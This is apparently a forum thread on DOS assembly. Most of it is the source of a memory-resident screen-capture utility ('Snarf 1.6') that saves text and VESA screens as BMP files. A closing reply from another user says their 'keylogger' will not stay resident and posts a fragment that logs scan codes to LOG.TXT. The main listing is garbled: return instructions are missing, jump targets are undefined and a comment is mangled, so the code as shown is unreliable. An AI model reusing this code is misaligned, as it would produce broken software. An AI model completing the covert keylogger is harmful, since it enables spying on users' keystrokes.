        je      beep10

        mov     ah, 7           ;start with low tone
beep15: mov     al, 0D0h
        out     42h, al         ;start beep
        mov     al, ah
        and     al, 7Fh
        out     42h, al

        mov     al, es:[6Ch]    ;get system timer tick
beep20: cmp     al, es:[6Ch]    ;wait for tick count to change
        je      beep20

        xor     ah, 84h         ;flip carry and change tone from low to high
        jc      beep15          ;loop

        pop     ax              ;restore port
        out     61h, al

        mov     al, 0FFh        ;(This keeps the Puzzle program happy.
        out     42h, al         ;There is no way to read what timer 2 has been
        out     42h, al         ; programmed for--only the output latch can be
                                ; read, not the input counter)
        pop     es              ;restore registers
        pop     ax

;The VESA graphic modes require more video RAM than can fit in the allotted
; space (A0000h-AFFFFh). Thus it's mapped into this 64K space a page at a time.
;Routine to set up parameters to support reading pixels in a VESA image.
; Input: ax = video mode
; Outputs: vxMode, vXSize, vYSize, vxPage, vxPageB, vGranSh, bytesPerLine,
;  bytesPerPix, AtiCard
; WARNING: These outputs are only guaranteed for VESA modes >= 100h and mode 13h
; BytesPerPix is set to zero for all planar modes (VESA and VGA).

setVESA:push    ax
        push    bx                      ;preserve registers
        push    cx
        push    dx
        push    di
        push    es

        mov     vxMode, ax              ;record the video mode

;Select page 0 (even if non-VESA mode)
        mov     ax, 4F05h               ;CPU video memory window control
        xor     bx, bx                  ;window A
        xor     dx, dx                  ;page 0
        mov     vxPage, dx              ;record selected page (used by mode 13h)
        int     10h
        mov     vxPageB, -1             ;force page select for ATI window B

        mov     ax, 320                 ;initialize in case mode is 13h
        mov     word ptr bytesPerLine, ax
        mov     vXSize, ax
        mov     vYSize, 200
        mov     vGranSh, bl             ;vGranSh:= 0
        inc     bx                      ;bytesPerPix:= 1

        cmp     vxMode, 13h             ;skip if mode 13h
        je      sv17                    ;(short jump trick)
         dec    bx                      ;bytesPerPix:= 0
         cmp    vxMode, 7Fh             ;skip if not an SVGA mode >= 100h (mode
sv17:   jbe     sv20                    ; 6Ah is a planar mode and not set up)

        mov     ax, 4F01h               ;return SVGA info in 256-byte "buffer"
        mov     cx, vxMode
        mov     di, offset RESIDENT_GROUP: buffer
        push    ds
        pop     es
        int     10h

;Pick out the info we need
        mov     al, 0                   ;assume window A is readable
        test    [buffer+2], 02h         ;is window A readable?
        jne     sv18                    ;skip if so
         mov    al, 1                   ;window A is not readable; use window B
sv18:   mov     AtiCard, al

        mov     ax, word ptr [buffer+16] ;bytesPerLine = buffer(16)
        mov     word ptr bytesPerLine, ax
        mov     ax, word ptr [buffer+18] ;vXSize = buffer(1Cool
        mov     vXSize, ax
        mov     ax, word ptr [buffer+20] ;vYSize = buffer(20)
        mov     vYSize, ax

;vGranSh = ln2(64/granularity)
        mov     bx, word ptr [buffer+4] ;granularity = buffer(4)
        xor     ax, ax                  ;avoid div by 0--assume a 64K window
        test    bx, bx                  ;if bx = 0 then vGranSh:= 0
        je      sv19
         mov    al, 64
         div    bl                      ;al(q):ah(r) <- ax / bl
         cbw                            ;vGranSh:= ln2(al)
         bsr    ax, ax                  ;Bit Scan Reverse; ax:= bit # of set bit
sv19:   mov     vGranSh, al

        xor     bx, bx                  ;bitsPerPixel = [buffer+25]
        mov     bl, [buffer+25]
        add     bl, 3                   ;bytesPerPixel = (bitsPerPixel+3)>>3
        shr     bl, 3
        mov     word ptr bytesPerPix, bx

        pop     es                      ;restore registers
        pop     di
        pop     dx
        pop     cx
        pop     bx
        pop     ax

;Routine to set up parameters to support reading pixels in a text image.
; Input: ax=video mode, si=pointer to mode's table entry
; Outputs: textBase, textWidth, textHeight, pageOffset, fontOffset, fontSeg, and
; fontHeight.

        push    es

        mov     dx, 0B800h              ;set base segment address of screen
        cmp     al, 7                   ;TextBase:= if Mode = $7 then $B000
        jne     st10                    ; else $B800;
         mov    dh, 0B0h
st10:   mov     textBase, dx

;TextWidth:= Peek($40,$4A) + Peek($40,$4B)<<8;
        push    40h
        pop     es
        mov     ax, es:[4Ah]
        mov     textWidth, ax

;PageOffset:= Peek($40,$4E) + Peek($40,$4F)<<8;
        mov     ax, es:[4Eh]
        mov     pageOffset, ax

        mov     ax, es:[84h]            ;TextHeight:= Peek($40,$84) + 1;
        inc     ax
        mov     byte ptr textHeight, al
        mov     al, ah                  ;FontHeight:= Peek($40,$85);
        mov     byte ptr fontHeight, al
        mov     fontSeg, cs
        xor     ah,ah
        mov     bp,ax
        mov     dx,3D4h
        mov     al,13h
        out     dx,al
        inc     dx
        in      al,dx
        xor     ah,ah
        shl     ax,1
        mov     textWidth,ax
        mov     dx,3CEh
        mov     al,06h
        out     dx,al
        inc     dx
        in      al,dx
        test    al,1
        jnz     IsGraphMode
        and     al,1100b
        shr     al,2
        mov     bx,ax
        mov     ah,[bx+offset MemOfs]
        xor     al,al
        mov     textBase,ax
        mov     dx,3C4h
        mov     al,6
        out     dx,al
        inc     dx
        in      al,dx
        dec     dx
        push    ax
        mov     al,03h
        out     dx,al
        inc     dx
        in      al,dx
        dec     dx
        mov     ah,al
        push    ax
        and     al,000011b              ;010011b - 1st, 101100b - 2nd
        and     ah,010000b
        shr     ah,2
        or      al,ah
        xor     ah,ah
        xor     bx,bx
        call    GetFont
        pop     ax
        and     al,001100b              ;010011b - 1st, 101100b - 2nd
        and     ah,100000b
        shr     ah,1
        or      al,ah
        shr     al,2
        xor     ah,ah
        mov     bx,8*1024
        call    GetFont
        push    cs
        pop     ds
        pop     ax
        mov     ah,al
        mov     al,6
        mov     dx,3C4h
        out     dx,ax
        pop     es                      ;restore registers

        les     di,dword ptr fontOffset
        add     di,bx
        mov     si,ax
        mov     bh,[si+offset VidOfs]
        xor     bl,bl
        mov     cx,256
        push    0A000h
        pop     ds
        mov     si,offset VideoPrm
        call    @2
        xchg    bx,si
@3:     push    cx
        mov     cx,bp
        rep     movsb
        mov     cl,32
        sub     cx,bp
        add     si,cx
        pop     cx
        loop    @3
        xchg    bx,si
@2:     mov     dh,3
        mov     ah,2
        mov     dl,0C4h
        call    @1
        mov     ah,3
        mov     dl,0CEh
@1:     cli
@0:     segcs
        out     dx,al
        inc     dx
        out     dx,al
        dec     dx
        dec     ah
        jnz     @0

        dw      0402h,0704h,0005h,0406h,0204h
        dw      0302h,0304h,1005h,0E06h,0004h

VidOfs: db      00h
        db      40h
        db      80h
        db      0C0h
        db      20h
        db      60h
        db      0A0h
        db      0E0h

MemOfs: db      0A0h
        db      0A0h
        db      0B0h
        db      0B8h
;Routine to return the color of a pixel on the graphics screen.
; Inputs: cx=X; dx=Y coordinates
; Outputs: eax

readPix:push    es                      ;preserve registers
        push    edx

        cmp     bytesPerPix, 0          ;skip if planar mode (<=12h, 102, 4, 6h)
        je      rp100

        xor     eax, eax                ;some VESA modes exceed 64K pixels
        mov     ax, dx                  ;Y
        imul    eax, bytesPerLine       ;edx:= Y*bytesPerLine + X*bytesPerPix
        xor     edx, edx
        mov     dx, cx                  ;X
        imul    edx, bytesPerPix
        add     edx, eax

;High word of edx = required 64K video page
        ror     edx, 16                 ;dx:= page
        cmp     AtiCard, 0              ;is window A readable?
        je      rp05                    ;skip if so
         cmp    dx, vxPageB             ;is page (window) B selected?
         jmp    rp07                    ;else go set page
rp05:   cmp     dx, vxPage              ;jump if point is on currently selected
rp07:   je      rp11                    ; page (window) A

;Select page in dx (i.e. move it into the 64K window at A0000h)
        push    bx                      ;save register
        mov     ax, 4F05h               ;CPU video memory window control
        xor     bx, bx                  ;window A
        add     bl, AtiCard             ;use window B if A is not readable
        jne     rp08                    ;skip if ATI card
         mov    vxPage, dx              ;record selected page
         jmp    rp09
rp08:   mov     vxPageB, dx

;Set window position in video memory in window granularity units. Unfortunately
; some SVGA manufacturers don't use a granularity of 64K, and this causes a lot
; of trouble.
        push    dx
        push    cx
        mov     cl, vGranSh
        shl     dx, cl
        pop     cx

        int     10h
        pop     dx
        pop     bx                      ;restore registers
        push    0A000h                  ;point es to video memory
        pop     es
        push    si
        rol     edx, 16                 ;restore offset into 64K page
        mov     si, dx                  ;and use si to access it
        mov     al, byte ptr bytesPerPix ;read 1, 2, 3 or 4 bytes of color

        cmp     al, 1
        jne     jj10
        mov     al, es:[si]             ;read 1 byte of color
        movzx   eax, al
        jmp     jj90
        cmp     al, 2
        jne     jj20
        mov     ax, es:[si]             ;read 2 bytes of color
        movzx   eax, ax
        jmp     jj90
        cmp     al, 3
        jne     jj30

;Read 3 bytes of color
; 65536 is not evenly divisible by 3 so a single pixel can span two windows)
        push    cx
        mov     cx, 3                   ;read 3 bytes of color (total)
rp22:   mov     al, es:[si]             ;read 1 byte of color (LSB first)
        inc     edx                     ;next address

;High word of edx = required 64K video page
        ror     edx, 16                 ;dx:= page
        cmp     AtiCard, 0              ;if ATI card then use vxPageB
        je      rp22a                   ;skip if not
         cmp    dx, vxPageB
         jmp    rp22b
rp22a:  cmp     dx, vxPage              ;skip if pixel is in the currently
rp22b:  je      rp23                    ; selected page

;Select page in dx (i.e. move it into the 64K window at A0000h)
        push    eax
        push    bx
        mov     ax, 4F05h               ;CPU video memory window control
        xor     bx, bx                  ;window A
        add     bl, AtiCard             ;if ATI card then
        jne     rp22c                   ;skip if so
         mov    vxPage, dx              ;record selected page
         jmp    rp22d
rp22c:  mov     vxPageB, dx             ;use window B
;Set window position in video memory in window granularity units. Unfortunately
; some SVGA manufacturers don't use a granularity of 64K, and this causes a lot
; of trouble.
        push    dx
        push    cx
        mov     cl, vGranSh
        shl     dx, cl
        pop     cx

        int     10h
        pop     dx
        pop     bx                      ;restore registers
        pop     eax
        rol     edx, 16                 ;normal format
        mov     si, dx
        ror     eax, 8                  ;next RGB color
        loop    rp22                    ;loop for 3 bytes
        shr     eax, 8

        pop     cx
        jmp     jj90

        mov     eax, es:[si]            ;read 4 bytes of color
        pop     si
        pop     edx
        pop     es

;Use BIOS to handle planar modes (very slow, but it handles all the modes)
rp100:  push    bx

        push    0                       ;to access BIOS variables
        pop     es
        mov     bh, es:scrPag           ;get currently displayed screen page
        mov     ah, 0Dh                 ;pixel read function
        int     10h                     ;do the function

        movzx   eax, al                 ;zero high bytes
        pop     bx                      ;restore registers

        pop     edx
        pop     es

;Write byte in al to buffered output file
; bx = file handle

byteOutx4:                              ;alternate entry point
        shl     al, 2                   ;multiply by 4 (for color registers)

byteOut:push    di                      ;main entry point

        mov     di, [outPtr]            ;get pointer
        cmp     di, offset RESIDENT_GROUP: bufEnd
        jb      bo50                    ;skip if buffer is not full
         push   cx
         mov    cx, bufEnd - buffer     ;number of bytes to write
         call   wrtBuf
         pop    cx
         mov    di, offset RESIDENT_GROUP: buffer ;reset pointer to start
        mov     [di], al                ;store byte into buffer at the pointer
        inc     di                      ;point to next entry
        mov     [outPtr], di            ;save pointer

        pop     di                      ;restore register

;Write the output buffer to disk file
; bx = handle
; cx = number of bytes to write

wrtBuf: push    dx                      ;preserve registers
        push    eax

        mov     ah, 40h                 ;DOS function to write to a file
        mov     dx, offset RESIDENT_GROUP: buffer
        int     21h
        cmp     ax, cx                  ;return status ne if number written is
                                        ; not equal the number requested
        pop     eax                     ;restore registers
        pop     dx

;Display the string pointed to by the ds:si register. The (ASCIIZ) string must
; be terminated with a 0 byte. The direction (D) flag must be clear.
; The al and si registers are altered.

to10:   int     29h             ;display character
textOut:lodsb                   ;al:= ds:[si++]
        test    al, al
        jne     to10

;Display the positive integer in the ax register in the range 0..65535.
; The ax and dx registers are altered.

numOut: xor     dx, dx          ;Q:= N/10;
        div     cs:noTen        ;dx:ax/10
        push    dx              ;R:= rem(0);
        test    ax, ax          ;if Q # 0 then NumOut(Q); \recurse
        je      no20
         call   numOut
no20:   pop     ax              ;ChOut(0, R+^0);
        add     al, '0'
        int     29h

noTen   dw      10

;All done
;Restore VESA window page

getOut: mov     ax, 4F05h       ;CPU video memory window control
        xor     bx, bx          ;return position for window A
        mov     dx, savePage    ;restore saved page
        int     10h

        mov     ax, 4F05h       ;CPU video memory window control
        mov     bx, 0001h       ;return position for window B
        mov     dx, savePageB   ;restore saved page
        int     10h

        mov     ax, 0001h       ;turn on mouse pointer if it was on initially
        int     33h             ; (a counter in int 33h handles with this)

getOut9:call    beep            ;indicate that image capture is all done
        pop     es


;               MOV     AX,0E07H        ; emit another beep
;               INT     10H

; Restore previous DTA

L94:            PUSH    DS              ; preserve DS
                LDS     DX,PrevDTA      ; DS:DX -> previous DTA
                MOV     AH,1AH          ; INT 21H function IAH (set DTA addr)
                INT     21H
                POP     DS

; Restore previous PSP

                MOV     BX,PrevPSP      ; BX = previous PSP
                MOV     AH,50H          ; INT 21H function 50H
                CALL    Int21v          ; (set PSP address)

; Restore previous extended error information

                MOV     AX,DOSVersion
                CMP     AX,30AH
                JB      L95             ; jump if DOS ver earlier than 3.1
                CMP     AX,0A00H
                JAE     L95             ; jump if MS OS/2-DOS 3.x box

                MOV     DX,OFFSET RESIDENT_GROUP:PrevExtErrInfo
                MOV     AX,5D0AH
                INT     21H             ; (restore extended error information)

; Restore previous DOS break checking

L95:            MOV     DL,PrevBreak    ; DL = previous state
                MOV     AX,3301H
                INT     21H

; Restore previous break and critical error traps

                MOV     CX,NTrap
                MOV     SI,OFFSET RESIDENT_GROUP:StartTrapList
                PUSH    DS              ; preserve DS

L96:            LODS    BYTE PTR CS:[SI]    ; AL = interrupt number
                                        ; CS:SI -> byte past interrupt number

                LDS     DX,CS:[SI+1]    ; DS:DX ->  previous handler
                MOV     AH,25H          ; INT 21H function 25H
                INT     21H             ; (set interrupt vector)
                ADD     SI,7            ; DS:SI -> next in list
                LOOP    L96
                POP     DS

; Restore all registers

                .386                    ;80386 required
                POP     ES

                MOV     SS,PrevSS
                MOV     SP,PrevSP
                POP     DS

; Finally reset status flag and return

                MOV     BYTE PTR CS:HotFlag,FALSE
TSRapp          ENDP



ErrorModeAddr   DD      ?               ; address of DOS ErrorMode flag
InDOSAddr       DD      ?               ; address of DOS InDOS flag

NISR            DW      (EndISRList-StartISRList)/8 ; number of installed ISRs

StartISRList    DB      05H             ; INT number
InISR5          DB      FALSE           ; flag
PrevISR5        DD      ?               ; address of previous handler
                DW      OFFSET RESIDENT_GROUP:ISR5

                DB      08H
InISR8          DB      FALSE
PrevISR8        DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR8

                DB      09H
InISR9          DB      FALSE
PrevISR9        DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR9

                DB      10H
InISR10         DB      FALSE
PrevISR10       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR10

                DB      13H
InISR13         DB      FALSE
PrevISR13       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR13

                DB      28H
InISR28         DB      FALSE
PrevISR28       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR28

                DB      2FH
InISR2F         DB      FALSE
PrevISR2F       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR2F

EndISRList      LABEL   BYTE

TSRPSP          DW      ?               ; resident PSP segment address
TSRSP           DW      TSRStackSize    ; resident SS:SP
PrevPSP         DW      ?               ; previous PSP
PrevSP          DW      ?               ; previous SS:SP
PrevSS          DW      ?

HotKey          DB      DefHotKey       ;scan code of hot key

HotKBFlag       DB      KBAlt
HotKBMask       DB      (KBIns OR KBCaps OR KBNum OR KBScroll) XOR 0FFH
HotFlag         DB      FALSE           ;currently processing hot key

ActiveTSR       DB      FALSE

DOSVersion      LABEL   WORD
                DB      ?               ;minor version number
MajorVersion    DB      ?               ;major version number

; The following data is used by TSR application

NTrap           DW      (EndTrapList-StartTrapList)/8   ;number of traps

StartTrapList   DB      1BH
Trap1B          DB      FALSE
PrevISR1B       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR1B

                DB      23H
Trap23          DB      FALSE
PrevISR23       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR23

                DB      24H
Trap24          DB      FALSE
PrevISR24       DD      ?
                DW      OFFSET RESIDENT_GROUP:ISR24

EndTrapList     LABEL   BYTE

PrevBreak       DB      ?               ; previous break-checking flag

PrevDTA         LABEL   DWORD           ; previous DTA address
PrevDTAoffs     DW      ?
PrevDTAseg      DW      ?

PrevExtErrInfo  LABEL   BYTE            ; previous extended error information
PrevExtErrAX    DW      ?
PrevExtErrBX    DW      ?
PrevExtErrCX    DW      ?
PrevExtErrDX    DW      ?
PrevExtErrSI    DW      ?
PrevExtErrDI    DW      ?
PrevExtErrDS    DW      ?
PrevExtErrES    DW      ?
                DW      3 DUP(0)

;SnapFile       DB      '\snap.img'     ; output file name in root directory


        align   2
savePage  dw    0               ;initial page A in VESA window
savePageB dw    0               ;initial page B in VESA window
outPtr  dw      0               ;output buffer byte pointer
planeMask db    0Fh             ;value read from Color Plane Enable register

fileName db     'SNARF000.BMP', 0
errMsg   db     'Snarf 1.6 Error: ', 0

        align   2
;               Mode    Width   Height  Depth
modeTbl dw      04h,    320,    200,    4       ;depth is actually 2, but use 4
        dw      05h,    320,    200,    4       ; because 2 is not a legal .bmp
        dw      06h,    640,    200,    1       ; format
        dw      0Dh,    320,    200,    4
        dw      0Eh,    640,    200,    4
        dw      0Fh,    640,    350,    1
        dw      10h,    640,    350,    4
        dw      11h,    640,    480,    1
        dw      12h,    640,    480,    4
        dw      13h,    320,    200,    8
        dw      6Ah,    800,    600,    4
        dw      0h,     0,      0,      4       ;text
        dw      1h,     0,      0,      4
        dw      2h,     0,      0,      4
        dw      3h,     0,      0,      4
        dw      7h,     0,      0,      4       ;(need at least 3 colors)
        dw      108h,   0,      0,      4       ;VESA text
        dw      109h,   0,      0,      4
        dw      10Ah,   0,      0,      4
        dw      10Bh,   0,      0,      4
        dw      10Ch,   0,      0,      4
        dw    0FFFFh,   0,       0,     0

header  db      'BM'            ; 0: file must begin with "BM" (Bit Map)
        dd      54 + 256*4 + 640*480 ;2: size of entire file (default mode 101h)
        dw      0               ; 6: 0
        dw      0               ; 8: 0
        dd      54 + 256*4      ;10: offset from start of file to image data
        dd      40              ;14: size of sub-header (bytes)
        dd      640             ;18: image width in pixels  (TVW for mode 101h)
        dd      480             ;22: image height in pixels (TVH for mode 101h)
        dw      1               ;26: planes
        dw      8               ;28: bits per pixel         (TVD for mode 101h)
        dd      0               ;30: compression type (not used)
        dd      0               ;34: size of compressed image data (not used)
        dd      0               ;38: horizontal resolution (not used)
        dd      0               ;42: vertical resolution (not used)
        dd      0               ;46: number of colors used (not used)
        dd      0               ;50: number of "important" colors (not used)

;WARNING: These values (except vxMode) are only valid for modes >= 100h & 13h
        align   2
vXSize  dw      0       ;width of image in pixels
vYSize  dw      0       ;height of image in pixels
bytesPerPix  dd 0       ;bytes per pixel (0, 1, 2, 3, or 4)
bytesPerLine dd 0       ;bytes per scan line (e.g: 320, 1920, 2560, 2048)
vxMode  dw      3       ;currently selected video mode
vxPage  dw      0       ;64K page of video RAM mapped into A0000h
vxPageB dw      0       ;64K page (window B) of video RAM mapped into A0000h
vGranSh db      0       ;window posn = vxPage << (ln2(64/granularity))
;Some video displays (notably those made by ATI) do not read pixels from
; window A. Instead they read from window B.
AtiCard db      0       ;ATI flag: 1=read from window B, else read from A
        align   2
;Variables for text capture:
mode            dw      0       ;mode number
handle          dw      0       ;file handle
graphMode       dw      0       ;flag: graphic mode if non-zero (vs. text mode)
textBase        dw      0       ;base segment address of screen (B800 or B000)
textWidth       dw      0       ;screen width in character columns
textHeight      dw      0       ;screen height in character lines
pageOffset      dw      0       ;offset to currently active page (bytes)
fontOffset      dw      OFFSET RESIDENT_GROUP:currfont;address of BIOS font table (offset and segment)
fontSeg         dw      0
fontHeight      dw      0       ;character height in pixels = number of bytes
                                ; per character in font table
buffer  db      256 dup (?)     ;VESA mode information block and disk buffer
bufEnd  equ     $               ;end of buffer +1
currfont        db 2*8*1024 dup(?)




                DB      TSRStackSize DUP(?)


;         Program Entry Point -- Transient Installation Routines


installSnapTSR  PROC    FAR             ; At entry: CS:IP -> installSnapTSR
                                        ;           SS:SP -> stack
                                        ;           DS,ES -> PSP
; Save PSP segment

                MOV     AX,SEG RESIDENT_DATA
                MOV     DS,AX           ; DS -> RESIDENT_DATA

                MOV     TSRPSP,ES       ; save PSP segment

        call    numIn           ;get scan code on command line for hot key
        je      L99             ;skip if none provided--use the default
         mov    HotKey, al      ;set specified hot key scan code

; Check DOS version

                CALL    GetDOSVersion   ; AH = major version number
                                        ; AL = minor version number

; Verify that this TSR is not already installed
;       Before executing INT 21H in DOS versions 2.x, test whether INT 2FH
;       vector is in use.  If so, abort if PRINT.COM is using it.
;       (Thus, in DOS 2.x, if both this program and PRINT.COM are used,
;       this program should be made resident before PRINT.COM.)

                CMP     AH,2
                ja      L101            ; jump if version 3.0 or later

                MOV     AX,352FH        ; AH = INT 21H function number
                                        ; AL = interrupt number
                INT     21H             ; ES:BX = INT 2FH vector

                MOV     AX,ES
                OR      AX,BX           ; jump if current INT 2FH vector
                JNZ     L100            ; is nonzero

                PUSH    DS
                MOV     AX,252FH        ; AH = INT 21H function number
                                        ; AL = interrupt number
                MOV     DX,SEG RESIDENT_GROUP
                MOV     DS,DX
                MOV     DX,OFFSET RESIDENT_GROUP:MultiplexIRET

                INT     21H             ; point INT 2FH vector to IRET
                POP     DS
                JMP     SHORT L103      ; jump to install this TSR

L100:           MOV     AX,0FF00H       ; look for PRINT.COM
                INT     2FH             ; if resident, AH = print queue length
                                        ; otherwise, AH is unchanged

                CMP     AH,0FFH         ; if PRINT.COM is not resident
                JE      L101            ; use multiplex interrupt

                MOV     AL,1
                CALL    FatalError      ; abort if PRINT.COM already installed

L101:           MOV     AH,MultiplexID  ; AH = multiplex interrupt in value
                XOR     AL,AL           ; AL = 00H
                INT     2FH             ; multiplex interrupt

                TEST    AL,AL
                JZ      L103            ; jump if ok to install

                CMP     AL,0FFH
                JNE     L102            ; jump if not already installed

                MOV     AL,2
                CALL    FatalError      ; already installed

L102:           MOV     AL,3
                CALL    FatalError      ; can't install

; Get addresses of InDOS and ErrorMode flags

L103:           CALL    GetDOSFlags

;Display message indicating that Snarf is installed and ready

        push    ds
        mov     ax, seg TRANSIENT_DATA
        mov     ds, ax
        mov     ah, 09h         ;int 21h function 09h (display string)
        mov     dx, offset MessageOk
        int     21h
        pop     ds

; Install this TSR's interrupt handlers

;               PUSH    ES              ; preserve PSP segment
; WRONG! ES does not necessarily contain PSP at this point

                MOV     CX,NISR
                MOV     SI,OFFSET StartISRList

L104:           LODSB                   ; AL = interrupt number
                                        ; DS:ES -> byte past interrupt number
                PUSH    AX              ; previous AX
                MOV     AH,35H          ; INT 21H function 35H
                INT     21H             ; ES:BX = previous interrupt vector
                MOV     [SI+1],BX       ; save offset and segment
                MOV     [SI+3],ES       ; of previous handler

                POP     AX              ; AL = interrupt number
                PUSH    DS              ; preserve DS
                MOV     DX,[SI+5]
                MOV     BX,SEG RESIDENT_GROUP
                MOV     DS,BX           ; DS:DX -> this TSR's handler
                MOV     AH,25H          ; INT 21H function 25H
                INT     21H             ; (set interrupt vector)
                POP     DS              ; restore DS
                ADD     SI,7            ; DS:SI -> next in list
                LOOP    L104

; Free the environment block

;               POP     ES              ; ES = PSP segment
                mov     es, TSRPSP
                PUSH    ES              ; preserve PSP segment

                MOV     ES,ES:[2CH]     ; ES = segment of environment block
                MOV     AH,49H          ; INT 21H function 49H
                INT     21H             ; (free memory block)

; Terminate and stay resident

                POP     AX              ; AX = PSP segment address
                MOV     DX,CS           ; DX = paragraph address of start of
                                        ; transient portion (end of resident
                                        ; portion)
                SUB     DX,AX           ; DX = size of resident portion (paras)
                MOV     AX,3100H        ; AH = INT 21H function number
                                        ; AL = 00H (return code)
                INT     21H
InstallSnapTSR  ENDP


GetDOSVersion   PROC    NEAR            ; Caller:   DS = seg RESIDENT_DATA
                                        ;           ES = PSP
                                        ; Returns:  AH = major version
                                        ;           AL = minor version
                ASSUME  DS:RESIDENT_DATA

                MOV     AH,30H          ; INT 21H function 30H
                                        ; (get DOS version)
                INT     21H
                CMP     AL,2
                JB      L110            ; jump if versions 1.x

                XCHG    AH,AL           ; AH = major version
                                        ; AL = minor version
                MOV     DOSVersion,AX   ; save with major version in
                                        ; high order byte

L110:           MOV     AL,00H
                CALL    FatalError      ; abort if versions 1.x
GetDOSVersion   ENDP


GetDOSFlags     PROC    NEAR            ; Caller    DS = seg RESIDENT_DATA
                                        ; Returns:  InDOSAddr -> InDOS
                                        ;           ErrorModeAddr -> ErrorMode
                                        ; Destroys: AX,BX,CX,DI
                ASSUME  DS:RESIDENT_DATA

; Get InDOS address from DOS

                PUSH    ES

                MOV     AH,34H          ; INT 21H function number
                INT     21H             ; ES:BX -> InDOS

                MOV     WORD PTR InDOSAddr,BX
                MOV     WORD PTR InDOSAddr+2,ES

; Determine ErrorMode address

                MOV     WORD PTR ErrorModeAddr+2,ES     ; assume ErrorMode is
                                                        ; in the same segment
                                                        ; as InDOS
                MOV     AX,DOSVersion
                CMP     AX,30AH
                JB      L120            ; jump if DOS version earlier
                                        ; than 3.1
                CMP     AX,0A00H
                JAE     L120            ;   or MS OS/2-DOS 3.x box

; if you fell through to here you get to do it the easy way

                DEC     BX              ; in DOS 3.1 and later ErrorMode
                MOV     WORD PTR ErrorModeAddr,BX       ; is just before InDOS
                JMP     SHORT L125

; Ok do it the hard way because user is running a weird version of DOS
; scan DOS segment for ErrorMode

L120:           MOV     CX,0FFFFH       ; CX = maximum number of bytes to scan
                XOR     DI,DI           ; ES:DI -> start of DOS segment

L121:           MOV     AX,WORD PTR CS:LF2  ; AX = opcode for INT 28H

L122:           REPNE   SCASB           ; scan for first byte of fragment
                JNE     L126            ; jump if not found

                CMP     AH,ES:[DI]              ; inspect second byte of opcode
                JNE     L122                    ; junm if not found

                MOV     AX,WORD PTR CS:LF1 + 1  ; AX = opcode for CMP
                CMP     AX,ES:[DI] [LF1-LF2]
                JNE     L123                    ; jump if opcode not CMP

                MOV     AX,ES:[DI][(LF1-LF2)+2] ; AX = offset of ErrorMode
                JMP     SHORT L124              ; in DOS segment

L123:           MOV     AX,WORD PTR CS:LF3 + 1  ; AX = opcode for TEST
                CMP     AX,ES:[DI] [LF3-LF4]
                JNE     L121                    ; jump if opcode not TEST

                MOV     AX,ES:[DI][(LF3-LF4)+2] ; AX = offset of ErrorMode

L124:           MOV     WORD PTR ErrorModeAddr,AX

L125:           POP     ES

; You arrived here if address of ErrorMode not found

L126:           MOV     AL,04H
                CALL    FatalError

; Code fragments for scanning for ErrorMode flag

LFnear          LABEL   NEAR            ; dummy labels for addressing
LFbyte          LABEL   BYTE
LFword          LABEL   WORD

LF1:            CMP     SS:LFbyte,0     ; CMP ErrorMode,0
                JNE     LFnear
LF2:            INT     28H

LF3:            TEST    SS:LFbyte,0FFH  ; TEST ErrorMode,0FFH
                JNE     LFnear
                PUSH    SS:LFword
LF4:            INT     28H
GetDOSFlags     ENDP

;Routine to read a decimal integer from the command line and return it in ax.
; Range 0..255
; Returns 0 if no number on command line
numIn:  push    ds              ;preserve registers
        push    dx
        push    si

        mov     ds, TSRPSP      ;point to PSP
        mov     si, 81h         ;point to info on command line
        xor     dx, dx          ;zero accumulator

ni10:   mov     al, ds:[si]     ;fetch character from command line
        inc     si
        cmp     al, CR          ;carriage return?
        je      ni30            ;exit if so
        sub     al, '0'         ;is it a digit?
        jl      ni10            ;loop if not
        cmp     al, 9
        jg      ni10
        mov     dl, al          ;put first char into accumulator

ni20:   mov     al, ds:[si]     ;accumulate digits in dx until non-digit
        inc     si
        sub     al, '0'         ;is character a digit?
        jl      ni30            ;exit if not
        cmp     al, 9
        jg      ni30
        imul    dx, 10          ;accumulate decimal integer
        cbw                     ;ah:= 0
        add     dx, ax
        jmp     ni20            ;loop until non-digit is found
        xchg    ax, dx          ;return with integer in ax
        pop     si              ;restore registers
        pop     dx
        pop     ds


FatalError      PROC    NEAR            ; Caller:   AL = message number
                                        ;           ES = PSP

                PUSH    AX              ; save message number on stack

                MOV     BX,SEG TRANSIENT_DATA
                MOV     DS,BX

; Display the requested message

                MOV     BX,OFFSET MessageTable
                XOR     AH,AH           ; AH = message number
                SHL     AX,1            ; AX = offset into MessageTable
                ADD     BX,AX           ; DS:BX -> address of message
                MOV     DX,[BX]         ; DS:DX -> message
                MOV     AH,09H          ; INT 21H function 09H (display string)
                INT     21H             ; display error message

                POP     AX              ; AL = message number
                OR      AL,AL
                JZ      L130            ; jump if message number is zero
                                        ; (DOS version 1.x)
; Terminate (DOS 2.x and later)

                MOV     AH,4CH          ; INT 21H function 4CH
                INT     21H             ; (terminate process with return code)

; Terminate (DOS 1.x)


L130            PROC    FAR
                PUSH    ES              ; push PSP:0000H
                XOR     AX,AX
                PUSH    AX
L130            ENDP
FatalError      ENDP

; Transient data segment


MessageTable    DW      Message0        ; DOS version error
                DW      Message1        ; PRINT.COM found in DOS 2.x
                DW      Message2        ; already installed
                DW      Message3        ; can't install
                DW      Message4        ; can't find flag

Message0        DB  CR,LF,'DOS version 2.0 or later is required',CR,LF,'$'
Message1        DB  CR,LF,'Can''t install because PRINT.COM is active',CR,LF,'$'
Message2        DB  CR,LF,'This program is already installed',CR,LF,'$'
Message3        DB  CR,LF,'Can''t install this program',CR,LF,'$'
Message4        DB  CR,LF,'Unable to locate DOS ErrorMode flag',CR,LF,'$'

MessageOk       db  CR,LF,'Snarf 1.6 is now installed in memory',CR,LF,'$'

                END     InstallSnapTSR    

smaller is better
Post 27 Jan 2018, 18:31
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Joined: 26 Jan 2018
Posts: 13
luish 29 Jan 2018, 14:11
even with your piece of code my keylogger is not resident in memory. see my code now:
ORG 100h
HANDLE          DW      0
FILE_NAME       DB      "LOG.TXT",0
SCAN_CODE       DB      0
mov dx, LASTBYTE ; DX = bytes in resident section
mov cl, 4
shr dx, cl ; Convert to number of paragraphs
inc dx ; plus one
mov ax, 3100h ; Request Function 31h, error code=0
int 21h ; Terminate-and-stay-resident

